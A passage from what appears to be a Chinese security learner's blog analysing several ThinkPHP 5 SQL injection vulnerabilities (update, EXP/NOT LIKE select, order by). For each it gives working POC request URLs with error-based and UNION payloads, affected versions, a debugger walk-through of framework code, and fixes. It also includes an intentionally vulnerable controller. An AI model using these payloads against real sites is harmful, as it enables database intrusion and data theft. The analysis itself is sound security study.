<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">create database tpdemo;</span><br><span class="line">use tpdemo;</span><br><span class="line">create table users(</span><br><span class="line">	id int primary key auto_increment,</span><br><span class="line">	username varchar(50) not null</span><br><span class="line">);</span><br><span class="line">insert into users(id,username) values(1,&#39;testuser&#39;);</span><br></pre></td></tr></table></figure>

<p>这里也要设置username 字段 为<code>NULL</code> 才行</p>
<p>修改<code>/application/index/controller/index.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">app</span>\<span class="title">index</span>\<span class="title">controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Index</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $username = request()-&gt;get(<span class="string">&#x27;username/a&#x27;</span>);</span><br><span class="line">        db(<span class="string">&#x27;users&#x27;</span>)-&gt;where([<span class="string">&#x27;id&#x27;</span> =&gt; <span class="number">1</span>])-&gt;update([<span class="string">&#x27;username&#x27;</span> =&gt; $username]);</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;Update success&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="POC-1"><a href="#POC-1" class="headerlink" title="POC"></a>POC</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;public&#x2F;index&#x2F;index?username[0]&#x3D;point&amp;username[1]&#x3D;1&amp;username[2]&#x3D;updatexml(1,concat(0x7,user(),0x7e),1)^&amp;username[3]&#x3D;0</span><br></pre></td></tr></table></figure>

<p>很SQL 注入一非常类似。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914203133.png" alt="image-20200914152750668"></p>
<h2 id="影响版本-1"><a href="#影响版本-1" class="headerlink" title="影响版本"></a>影响版本</h2><p>漏洞影响版本： <strong>5.1.6&lt;=ThinkPHP&lt;=5.1.7</strong> (非最新的 <strong>5.1.8</strong> 版本也可利用)。</p>
<h2 id="漏洞概述-1"><a href="#漏洞概述-1" class="headerlink" title="漏洞概述"></a>漏洞概述</h2><p>本次漏洞存在于 <strong>Mysql</strong> 类的 <strong>parseArrayData</strong> 方法中由于程序没有对数据进行很好的过滤，将数据拼接进 <strong>SQL</strong> 语句，导致 <strong>SQL注入漏洞</strong> 的产生</p>
<p>注入类型：<code>update</code> 注入</p>
<h2 id="漏洞分析-1"><a href="#漏洞分析-1" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><blockquote>
<p>对于开源项目，在issue 或者 commit \ Releases 记录中，就能找到历史漏洞信息。这一点在CTF中经常用到，尤其是Node.js 的第三方依赖漏洞。</p>
</blockquote>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914203118.png" alt="image-20200914161022479"></p>
<ul>
<li>下断点，debug。观察参数传递过程</li>
<li>监控MySQL</li>
</ul>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914203111.png" alt="image-20200914184917592"></p>
<hr>
<p>下断点，开启Debug，打Payload。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914202218.png" alt="image-20200914173011583"></p>
<p><code>../thinkphp/library/think/db/Query.php</code> 中，Payload 传入Query 类的 <code>update</code>方法，跟进该方法，该方法调用了<code>Connection</code> 类的该方法为<code>update</code>方法，该方法又调用了 </p>
<p><code>$this-&gt;builder</code> 的<code>update</code> 方法，此处的<code>$this-&gt;builder</code> 为为<code>think\db\builder\Mysql</code> 类。<code>class Mysql extends Builder</code> ，该类继承于<code>Builder</code> 类。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914202201.png" alt="image-20200914170732409"></p>
<p>在<code>Builder</code>类中的<code>update</code>方法，调用了<code>parseData</code>方法，（正如上图debug结果。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914202036.png" alt="image-20200914184754350"></p>
<p>在该方法中的<code>swich</code>语句中，之前出现过漏洞，现在多了一条default 语句。而在新版本中被删除了。</p>
<p>跟进到<code>parseData</code> 方法，发现Payload 又被<code>parseArrayData</code>方法处理，继续跟进，</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914202026.png" alt="image-20200914185836504"></p>
<p>在<code>../thinkphp/library/think/db/builder/Mysql.php</code> 中的 200 行返回result 的地方打断点，调试结果如下。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914202011.png"></p>
<p>此处将可控变量经过拼接后被带入数据库进行查询。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914201959.png" alt="image-20200914193548748"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">parseArrayData</span>(<span class="params">Query $query, $data</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">list</span>($type, $value) = $data;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">switch</span> (strtolower($type)) &#123;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;point&#x27;</span>:</span><br><span class="line">            $fun   = <span class="keyword">isset</span>($data[<span class="number">2</span>]) ? $data[<span class="number">2</span>] : <span class="string">&#x27;GeomFromText&#x27;</span>;</span><br><span class="line">            $point = <span class="keyword">isset</span>($data[<span class="number">3</span>]) ? $data[<span class="number">3</span>] : <span class="string">&#x27;POINT&#x27;</span>;</span><br><span class="line">            <span class="keyword">if</span> (is_array($value)) &#123;</span><br><span class="line">                $value = implode(<span class="string">&#x27; &#x27;</span>, $value);</span><br><span class="line">            &#125;</span><br><span class="line">            $result = $fun . <span class="string">&#x27;(\&#x27;&#x27;</span> . $point . <span class="string">&#x27;(&#x27;</span> . $value . <span class="string">&#x27;)\&#x27;)&#x27;</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">default</span>:</span><br><span class="line">            $result = <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> $result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其中：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$result = $fun . <span class="string">&#x27;(\&#x27;&#x27;</span> . $point . <span class="string">&#x27;(&#x27;</span> . $value . <span class="string">&#x27;)\&#x27;)&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p>三个变量均可控。形式为：<code>$a(&#39;$b($c)&#39;)</code> </p>
<blockquote>
<p>现在就是想办法如何闭合，然后进行注入攻击。</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UPDATE &#96;users&#96;  SET &#96;username&#96; &#x3D; $a(&#39;$b($c)&#39;)  WHERE  &#96;id&#96; &#x3D; 1;</span><br></pre></td></tr></table></figure>

<p>即让<code>$fun</code> 为我们的恶意Payload 即可。然后闭合掉后面的部分。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">updatexml(1,concat(0x7,user(),0x7e),1)^(&#39;0(1)&#39;)</span><br></pre></td></tr></table></figure>

<h2 id="利用总结-1"><a href="#利用总结-1" class="headerlink" title="利用总结"></a>利用总结</h2><p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914201929.png" alt="carbon"></p>
<p>下图来自参考资料。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914201900.png" alt="8"></p>
<h2 id="漏洞修复-1"><a href="#漏洞修复-1" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p>升级最新版，</p>
<p>官方直接删了<code>parseArrayDate</code> 函数。</p>
<blockquote>
<p>一点点感想，我感觉按照这个师傅的分析思路，是逆着payload 去分析的漏洞原因，我好想正面直接挖啊，菜死了。</p>
</blockquote>
<h1 id="SQL注入三-select"><a href="#SQL注入三-select" class="headerlink" title="SQL注入三(select)"></a>SQL注入三(select)</h1><p>新增参考资料：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/wangtanzhi/p/12732557.html">https://www.cnblogs.com/wangtanzhi/p/12732557.html</a></p>
<blockquote>
<p>学习就是要学习不同大佬的思路，然后转换为自己的思路。</p>
</blockquote>
<h2 id="POC-2"><a href="#POC-2" class="headerlink" title="POC"></a>POC</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;public&#x2F;index.php&#x2F;index&#x2F;index&#x2F;?username&#x3D;)%20union%20select%20updatexml(1,concat(0x7,user(),0x7e),1)%23</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105138.png" alt="image-20200914214213065"></p>
<p>sqlmap 也可以跑出结果。</p>
<h2 id="影响版本-2"><a href="#影响版本-2" class="headerlink" title="影响版本"></a>影响版本</h2><p>ThinkPHP5 全版本</p>
<h2 id="漏洞概述-2"><a href="#漏洞概述-2" class="headerlink" title="漏洞概述"></a>漏洞概述</h2><p>本次漏洞存在于 <strong>Mysql</strong> 类的 <strong>parseWhereItem</strong> 方法中。由于程序没有对数据进行很好的过滤，将数据拼接进 <strong>SQL</strong> 语句，导致 <strong>SQL注入漏洞</strong> 的产生。</p>
<h2 id="漏洞分析-2"><a href="#漏洞分析-2" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><ul>
<li>MySQL 监控</li>
</ul>
<blockquote>
<p>监控不到，不知道为什么。配置也是正确的。</p>
</blockquote>
<p><code>/application/index/controller/index.php</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105308.png" alt="image-20200914220015121"></p>
<blockquote>
<p>然后用户输入的数据会原样进入框架的 SQL 查询方法中。首先程序先调用 Query 类的 where 方法，通过其 parseWhereExp 方法分析查询表达式，然后再返回并继续调用 select 方法准备开始构建 select 语句。（这个点得记住，框架的sql查询方法先进入 Query 类）</p>
</blockquote>
<hr>
<blockquote>
<p>程序默认调用 <strong>Request</strong> 类的 <strong>get</strong> 方法中会调用该类的 <strong>input</strong> 方法，但是该方法默认情况下并没有对数据进行很好的过滤，所以用户输入的数据会原样进入框架的 <strong>SQL</strong> 查询方法中。首先程序先调用 <strong>Query</strong> 类的 <strong>where</strong> 方法，通过其 <strong>parseWhereExp</strong> 方法分析查询表达式，然后再返回并继续调用 <strong>select</strong> 方法准备开始构建 <strong>select</strong> 语句。</p>
</blockquote>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105416.png" alt="image-20200914222945520"></p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105701.png" alt="image-20200914224146213"></p>
<p>此处调用<code>$this-&gt;builder</code>的<code>select</code>方法。而此处<code>$this-&gt;builder</code> 为<code>think/db/builder/Mysql</code> 类，继承于<code>Builder</code> 类。因此调用的是<code>Builder</code>类的<code>select</code> 方法</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105718.png" alt="image-20200914225616763"></p>
<p>在 <strong>select</strong> 方法中，程序会对 <strong>SQL</strong> 语句模板用变量填充，其中用来填充 <strong>%WHERE%</strong> 的变量中存在用户输入的数据。跟进这个 <strong>where</strong> 分析函数，会发现其会调用生成查询条件 <strong>SQL</strong> 语句的 <strong>buildWhere</strong> 函数。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105734.png" alt="image-20200914231827114"></p>
<p>此处<code>$where</code> 经过 <code>buildWhere</code> 方法处理后返回<code>$whereStr</code></p>
<p><code>parseWhereItem</code> 的 <code>where</code>  子单元函数方法调用，当操作符为<code>EXP</code> 时，经过拼接带入SQL查询，造成SQL注入。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105750.png" alt="image-20200914235436560"></p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105805.png" alt="image-20200915000616883"></p>
<p>完整的方法调用如上图绿色部分。</p>
<h2 id="利用总结-2"><a href="#利用总结-2" class="headerlink" title="利用总结"></a>利用总结</h2><p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105825.png" alt="carbon (1)"></p>
<h2 id="漏洞修复-2"><a href="#漏洞修复-2" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p>官网未修复。</p>
<blockquote>
<p>继承类，等面向对象的基本知识很重要。</p>
</blockquote>
<h1 id="SQL注入四-select"><a href="#SQL注入四-select" class="headerlink" title="SQL注入四(select)"></a>SQL注入四(select)</h1><p>漏洞复现环境和上面应该是差不多的。</p>
<h2 id="POC-3"><a href="#POC-3" class="headerlink" title="POC"></a>POC</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">public&#x2F;index.php&#x2F;index&#x2F;index?username[0]&#x3D;not%20like&amp;username[1][0]&#x3D;%%&amp;username[1][1]&#x3D;233&amp;username[2]&#x3D;)%20union%20select%201,user()%23</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915125740.png" alt="image-20200915122649716"></p>
<h2 id="影响版本-3"><a href="#影响版本-3" class="headerlink" title="影响版本"></a>影响版本</h2><p><strong>ThinkPHP: 5.0.10</strong></p>
<h2 id="漏洞概述-3"><a href="#漏洞概述-3" class="headerlink" title="漏洞概述"></a>漏洞概述</h2><blockquote>
<p>本次漏洞存在于 <strong>Mysql</strong> 类的 <strong>parseWhereItem</strong> 方法中。由于程序没有对数据进行很好的过滤，直接将数据拼接进 <strong>SQL</strong> 语句。再一个， <strong>Request</strong> 类的 <strong>filterValue</strong> 方法漏过滤 <strong>NOT LIKE</strong> 关键字，最终导致 <strong>SQL注入漏洞</strong> 的产生</p>
</blockquote>
<p>在MySQL 中 <code>NOT LIKE</code>  为模糊查询，什么是模糊查询呢？</p>
<blockquote>
<p>mysql模糊查询like的用法:</p>
<p>查询user表中姓名中有“王”字的：</p>
<p>select * from user where name like ‘%王%’</p>
<p>mysql模糊查询not like的用法</p>
<p>查询user表中姓名中没有“王”字的：</p>
<p>select * from user where name not like ‘%王%’</p>
</blockquote>
<h2 id="漏洞分析-3"><a href="#漏洞分析-3" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>该SQL注入漏洞影响版本为 <code>5.0.10</code> ，因此去 <code>5.0.11</code> 的更新记录中，则可以查看相关的修复操作。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915190936.png" alt="image-20200915132004061"></p>
<p>Commit ：<a target="_blank" rel="noopener" href="https://github.com/top-think/framework/commit/f43688a30ce921df1c7cda771620c0fbe1868e7d">https://github.com/top-think/framework/commit/f43688a30ce921df1c7cda771620c0fbe1868e7d</a></p>
<p>（ 急需如何快速定位到 某个指定的commit 记录的方法。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915140312.png" alt="image-20200915133611309"></p>
<p>可以看到，这里之前是没有将特殊字符 <code>NOT LIKE</code>   给过滤掉。</p>
<hr>
<p>根据Payload来分析漏洞原理：</p>
<blockquote>
<p>不管以哪种方式传递数据给服务器，这些数据在 <strong>ThinkPHP</strong> 中都会经过 <strong>Request</strong> 类的 <strong>input</strong> 方法</p>
</blockquote>
<p>在<code>input</code> 方法中：传入的数据会经过 filterValue过滤<code>和 </code>强制类型转换,然后返回。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915190852.png"></p>
<p>跟进该方法，查看是如何实现的。发现又会调用到<code>filterExp</code>  方法，</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915190840.png" alt="image-20200915142723291"></p>
<p>可以看到没有过滤<code>NOT LIKE</code></p>
<blockquote>
<p>ThinkPHP处理 <strong>SQL</strong> 语句的方法。首先程序先调用 <strong>Query</strong> 类的 <strong>where</strong> 方法，通过其 <strong>parseWhereExp</strong> 方法分析查询表达式，然后再返回并继续调用 <strong>select</strong> 方法准备开始构建 <strong>select</strong> 语句。</p>
</blockquote>
<p>![image-20200915144157181](/Users/m0nk3y/Library/Application Support/typora-user-images/image-20200915144157181.png)</p>
<p>此处的<code>$this-&gt;builder</code> 为 <code>think\db\builder\Mysql</code> 类。而<code>Mysql</code> 类继承于 <code>Builder</code>类，所以会继续调用到<code>Builder</code>类的<code>select</code>方法。该方法调用了<code>parseWhere</code>方法，然后调用了<code>buildWhere</code>方法，该方法继续调用了 <code>parseWhereItem</code> 方法，跟进该方法，</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915185921.png"></p>
<p>此处到 操作符 <code>$exp</code> 为 <code>NOT LIKE</code> 或 <code>LIKE</code> 时，MySQL 的逻辑控制符可控。后进行拼接返回带入SQL语句中执行，导致了SQL注入漏洞。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915185938.png" alt="image-20200915151528489"></p>
<p>最终的结果就是返回带有恶意的SQL Payload（<code>whereStr</code>，红色部分。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915190030.png" alt="image-20200915184916179"></p>
<p>整个过程的方法调用情况如绿色框起的部分。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(&#96;username&#96; NOT LIKE &#39;%%&#39; ) UNION SELECT 1,USER()# &#96;username&#96; NOT LIKE &#39;233&#39;)</span><br></pre></td></tr></table></figure>

<h2 id="利用总结-3"><a href="#利用总结-3" class="headerlink" title="利用总结"></a>利用总结</h2><p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915185921.png"></p>
<blockquote>
<p>下图来自七月火师傅的总结文章里的。</p>
</blockquote>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915191318.png" alt="9"></p>
<h2 id="漏洞修复-3"><a href="#漏洞修复-3" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p>增加过滤</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915140312.png"></p>
<h1 id="SQL注入五-order-by"><a href="#SQL注入五-order-by" class="headerlink" title="SQL注入五(order by)"></a>SQL注入五(order by)</h1><p>环境搭建也差不多，需要手动开启<code>../config/app.php</code> 下的<code>app_debug</code> 和 <code>app_trace</code></p>
<h2 id="POC-4"><a href="#POC-4" class="headerlink" title="POC"></a>POC</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;public&#x2F;index.php&#x2F;index&#x2F;index&#x2F;?orderby[id&#96;|updatexml(1,concat(0x7,user(),0x7e),1)%23]&#x3D;1</span><br></pre></td></tr></table></figure>



<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916002455.png" alt="image-20200915195454500"></p>
<h2 id="影响版本-4"><a href="#影响版本-4" class="headerlink" title="影响版本"></a>影响版本</h2><p><strong>5.1.16&lt;=ThinkPHP5&lt;=5.1.22</strong></p>
<h2 id="漏洞概述-4"><a href="#漏洞概述-4" class="headerlink" title="漏洞概述"></a>漏洞概述</h2><p>本次漏洞存在于 <code>Builder</code> 类的 <code>parseOrder</code> 方法中。由于程序没有对数据进行很好的过滤，直接将数据拼接进 SQL 语句，最终导致 SQL注入漏洞 的产生。</p>
<h2 id="漏洞分析-4"><a href="#漏洞分析-4" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232420.png" alt="image-20200915201246990"></p>
<p>![image-20200915202933679](/Users/m0nk3y/Library/Application Support/typora-user-images/image-20200915202933679.png)</p>
<p>从修改记录中看到，增加了一条if判断语句来过滤<code>$key</code>中的<code>)</code> 和 <code>#</code>  。这两个符号也是在CTF中往往会过滤的点。</p>
<p>我们的数据都会进入到<code>Request</code> 类中的<code>input</code>方法，并且经过<code>filterValue</code>方法的过滤和强制类型转换并返回<code>$data</code>。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232744.png"></p>
<p>这里<code>array_walk_recursive()</code>函数，对数组中的成员递归调用<code>filterValue</code> 过滤函数。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232803.png" alt="image-20200915205211882"></p>
<p>但是<code>filterValue</code> 过滤函数，不过滤数组的<code>key</code> ， 只过滤了数组的<code>value</code> 。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232824.png"></p>
<p>用户输入的数据会原样</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?orderby[id&#96;|updatexml(1,concat(0x7,user(),0x7e),1)%23]&#x3D;1</span><br></pre></td></tr></table></figure>

<p>进入框架的 SQL查询方法中，进入<code>Query</code>类，这次是通过调用<code>order</code>方法。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232853.png" alt="image-20200915210341486"></p>
<p>恶意Payload 未经过任何过滤直接传递给<code>options[&#39;order&#39;]</code> 中。接着调用<code>find()</code>方法。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232946.png" alt="image-20200915210940031"></p>
<p>此处<code>$this-&gt;connection</code> 是<code>think/db/connectior/Mysql</code>类 ，继承于<code>Connection</code>类，于是此处继续调用该类的<code>find()</code>方法，</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915233014.png" alt="image-20200915211715450"></p>
<p>该方法继续调用了 <code>$this-&gt;builder</code>, 即<code>think/db/builder/Mysql</code> 类的<code>select</code> 方法。该方法通过<code>str_replace</code> 函数，将数据填充到SQL语句中。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">select</span>(<span class="params">Query $query</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $options = $query-&gt;getOptions();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> str_replace(</span><br><span class="line">        [<span class="string">&#x27;%TABLE%&#x27;</span>, <span class="string">&#x27;%DISTINCT%&#x27;</span>, <span class="string">&#x27;%FIELD%&#x27;</span>, <span class="string">&#x27;%JOIN%&#x27;</span>, <span class="string">&#x27;%WHERE%&#x27;</span>, <span class="string">&#x27;%GROUP%&#x27;</span>, <span class="string">&#x27;%HAVING%&#x27;</span>, <span class="string">&#x27;%ORDER%&#x27;</span>, <span class="string">&#x27;%LIMIT%&#x27;</span>, <span class="string">&#x27;%UNION%&#x27;</span>, <span class="string">&#x27;%LOCK%&#x27;</span>, <span class="string">&#x27;%COMMENT%&#x27;</span>, <span class="string">&#x27;%FORCE%&#x27;</span>],</span><br><span class="line">        [</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseTable($query, $options[<span class="string">&#x27;table&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseDistinct($query, $options[<span class="string">&#x27;distinct&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseField($query, $options[<span class="string">&#x27;field&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseJoin($query, $options[<span class="string">&#x27;join&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseWhere($query, $options[<span class="string">&#x27;where&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseGroup($query, $options[<span class="string">&#x27;group&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseHaving($query, $options[<span class="string">&#x27;having&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseOrder($query, $options[<span class="string">&#x27;order&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseLimit($query, $options[<span class="string">&#x27;limit&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseUnion($query, $options[<span class="string">&#x27;union&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseLock($query, $options[<span class="string">&#x27;lock&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseComment($query, $options[<span class="string">&#x27;comment&#x27;</span>]),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseForce($query, $options[<span class="string">&#x27;force&#x27;</span>]),</span><br><span class="line">        ],</span><br><span class="line">        <span class="keyword">$this</span>-&gt;selectSql);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>然后调用了<code>parseOrder</code> 方法，跟进下，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">parseOrder</span>(<span class="params">Query $query, $order</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">empty</span>($order)) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $array = [];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">foreach</span> ($order <span class="keyword">as</span> $key =&gt; $val) &#123;</span><br><span class="line">        <span class="keyword">if</span> ($val <span class="keyword">instanceof</span> Expression) &#123;</span><br><span class="line">            $array[] = $val-&gt;getValue();</span><br><span class="line">        &#125; <span class="keyword">elseif</span> (is_array($val)) &#123;</span><br><span class="line">            $array[] = <span class="keyword">$this</span>-&gt;parseOrderField($query, $key, $val);</span><br><span class="line">        &#125; <span class="keyword">elseif</span> (<span class="string">&#x27;[rand]&#x27;</span> == $val) &#123;</span><br><span class="line">            $array[] = <span class="keyword">$this</span>-&gt;parseRand($query);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">if</span> (is_numeric($key)) &#123;</span><br><span class="line">                <span class="keyword">list</span>($key, $sort) = explode(<span class="string">&#x27; &#x27;</span>, strpos($val, <span class="string">&#x27; &#x27;</span>) ? $val : $val . <span class="string">&#x27; &#x27;</span>);</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                $sort = $val;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            $sort    = strtoupper($sort);</span><br><span class="line">            $sort    = in_array($sort, [<span class="string">&#x27;ASC&#x27;</span>, <span class="string">&#x27;DESC&#x27;</span>], <span class="literal">true</span>) ? <span class="string">&#x27; &#x27;</span> . $sort : <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">            $array[] = <span class="keyword">$this</span>-&gt;parseKey($query, 